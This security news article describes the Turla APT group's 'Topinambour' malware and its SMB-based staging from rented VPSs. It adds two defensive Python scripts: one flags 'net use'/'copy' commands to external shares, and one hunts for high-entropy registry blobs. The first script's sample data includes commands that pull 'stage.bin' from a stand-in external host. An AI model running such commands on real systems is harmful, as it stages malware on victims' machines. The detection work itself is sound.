The infamous Turla APT hacker group has renewed its arsenal with a new hacking tool named “Topinambour” (also known as Sunchoke) that is mainly used to target and compromise government networks.
The newly added tool has been in use since the beginning of 2019, and the malware authors themselves named it Topinambour.
The Turla APT group, also known as Venomous Bear or Waterbug, has been actively attacking various government networks since 2004, especially in the Middle East, Central and Far East Asia, Europe, and North and South America.
Turla is also responsible for several high-profile breaches, including the United States Central Command in 2008, the Swiss military company RUAG in 2014 and the French Armed Forces in 2018, and the APT has been active for more than a decade.
The threat actors use various arbitrary strings within this .NET module, including “TrumpTower”, “RocketMan” and “MiamiBeach”; these serve as the initial message from compromised victims to the control servers, which are compromised WordPress websites into which the threat actor injected .php scripts.
Topinambour Infection Process
In the initial stage of an attack, the threat actors use a legitimate software installer that has already been infected with the Topinambour dropper, which is an effective method of bypassing internet censorship.
This dropper carries the tiny .NET shell, which waits for Windows shell commands from the threat actors. Using this .NET shell and rented SMB shares on virtual private servers (VPS), the threat actors launch the next stage of malware with Windows shell commands such as “net use” and “copy”.
Here the researchers stated, “It’s hard to believe, but SMB still works through public networks,” and the campaign-related VPSs are located in South Africa.
The threat actors creatively use a “make_some_noise()” function, a remote-shell persistence routine, to avoid detection by security software.
The tiny .NET shell receives Windows shell commands from the command-and-control server and silently executes them.
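The staging step described above leaves a recognisable trace in process-creation telemetry: a `net use` or `copy` command whose UNC path points at a host outside the organisation's own address space. The following detection logic is an added example (not code from the article or from Kaspersky) that runs over a few constructed Sysmon-style process-creation records embedded inline. The internal network ranges, the internal DNS suffix and the documentation-range IP 198.51.100.23 (standing in for an external VPS) are all assumptions chosen for the example.

```python
"""Flag 'net use' / 'copy' commands that reach SMB shares on external hosts.

Added example; the records below are constructed, not real telemetry or IoCs.
"""
import ipaddress
import re
from typing import Dict, List, Optional

# Assumed internal address space and DNS suffix; adjust per environment.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "127.0.0.0/8", "169.254.0.0/16")]
INTERNAL_SUFFIXES = (".corp.example",)

# Commands that mount or pull from SMB shares (matched case-insensitively).
SMB_VERBS = ("net use", "net.exe use", "copy ", "xcopy ", "robocopy ")

# UNC prefix and host: \\host\share -> captures "host"
UNC_HOST_RE = re.compile(r"\\\\([^\\\s]+)\\")

# Constructed Sysmon-like events (Event ID 1 style: image + command line).
SAMPLE_EVENTS = [
    {"host": "ws-01", "image": r"C:\Windows\System32\net.exe",
     "cmd": r"net use \\198.51.100.23\share /user:guest pass"},
    {"host": "ws-01", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c copy \\198.51.100.23\share\stage.bin %TEMP%\s.bin"},
    {"host": "ws-02", "image": r"C:\Windows\System32\net.exe",
     "cmd": r"net use \\10.0.4.7\deploy"},                 # internal share
    {"host": "ws-02", "image": r"C:\Windows\System32\net.exe",
     "cmd": r"net use \\files.corp.example\public"},       # internal FQDN
    {"host": "ws-03", "image": r"C:\Windows\System32\cmd.exe",
     "cmd": r"cmd /c copy C:\a.txt D:\b.txt"},             # local copy
]


def external_unc_host(cmd: str) -> Optional[str]:
    """Return the first UNC host in cmd that is outside the internal space."""
    for host in UNC_HOST_RE.findall(cmd):
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            # Not an IP literal: treat dotted names outside our suffix as external.
            if "." in host and not host.lower().endswith(INTERNAL_SUFFIXES):
                return host
            continue
        if not any(ip in net for net in INTERNAL_NETS):
            return host
    return None


def detect(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return one finding per event that mounts/copies from an external share."""
    findings = []
    for ev in events:
        lowered = ev["cmd"].lower()
        if not any(verb in lowered for verb in SMB_VERBS):
            continue
        remote = external_unc_host(ev["cmd"])
        if remote:
            findings.append({"host": ev["host"], "remote": remote, "cmd": ev["cmd"]})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"{f['host']}: SMB access to external host {f['remote']}: {f['cmd']}")
```

In production the same rule belongs in the SIEM over Sysmon Event ID 1 (or Windows Security event 4688 with command-line auditing enabled); the allowlist of internal ranges and suffixes is what keeps it from firing on ordinary file-server traffic, and a corresponding egress block on TCP/445 removes the channel entirely.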
“The downloaded script takes a binary from the Windows registry and runs it. The registry subkeys and values vary from target to target.”
“Using the Windows system registry to store encrypted data that is later used by the malware also seems to be aimed at minimizing detection and reducing the digital footprint on any victim’s computer,” Kaspersky reported.
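Because the stored binary is encrypted, it stands out from ordinary registry data by its size and its byte-level randomness. The script below is an added example (not code from the article or from Kaspersky) that scores registry values by Shannon entropy and reports large, high-entropy blobs; the values it scans are constructed inline, and the key paths, the size threshold and the entropy threshold are assumptions. On a live Windows host the same scorer would be fed from `winreg.EnumValue` or from a `reg export` file instead of the embedded list.

```python
"""Hunt for large, high-entropy (encrypted/compressed) blobs in registry values.

Added example; all sample values and key paths below are constructed.
"""
import hashlib
import math
from collections import Counter
from typing import List, Tuple

MIN_SIZE = 256       # bytes; small config values are ignored (assumption)
MIN_ENTROPY = 7.0    # bits per byte; random-looking data approaches 8.0


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data (0.0 for empty or constant input)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def pseudo_random(n: int, seed: bytes = b"constructed") -> bytes:
    """Deterministic random-looking bytes (SHA-256 chain) for the sample."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


# Constructed registry values: (key path, value name, raw data).
SAMPLE_VALUES: List[Tuple[str, str, bytes]] = [
    (r"HKCU\Software\ExampleVendor\App", "InstallPath",
     r"C:\Program Files\ExampleVendor\app.exe".encode("utf-16-le")),
    (r"HKCU\Software\ExampleVendor\App", "Padding", b"\x00" * 4096),
    (r"HKCU\Software\Constructed\Sub", "Data", pseudo_random(1024)),
]


def suspicious_values(values, min_size=MIN_SIZE, min_entropy=MIN_ENTROPY):
    """Return (key, name, size, entropy) for values that look like stored payloads."""
    hits = []
    for key, name, data in values:
        if len(data) < min_size:
            continue
        ent = shannon_entropy(data)
        if ent >= min_entropy:
            hits.append((key, name, len(data), round(ent, 2)))
    return hits


if __name__ == "__main__":
    for key, name, size, ent in suspicious_values(SAMPLE_VALUES):
        print(f"{key}\\{name}: {size} bytes, entropy {ent}")
```

Expect benign hits from values that are legitimately compressed or random (certificate stores, thumbnails, cached binaries); an allowlist of known key paths and a comparison against a clean baseline of the same image turn this from a noisy scan into a usable hunt.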
Indicators of compromise
Some campaign-related MD5 hashes
Domains and IPs – VPSs used as control servers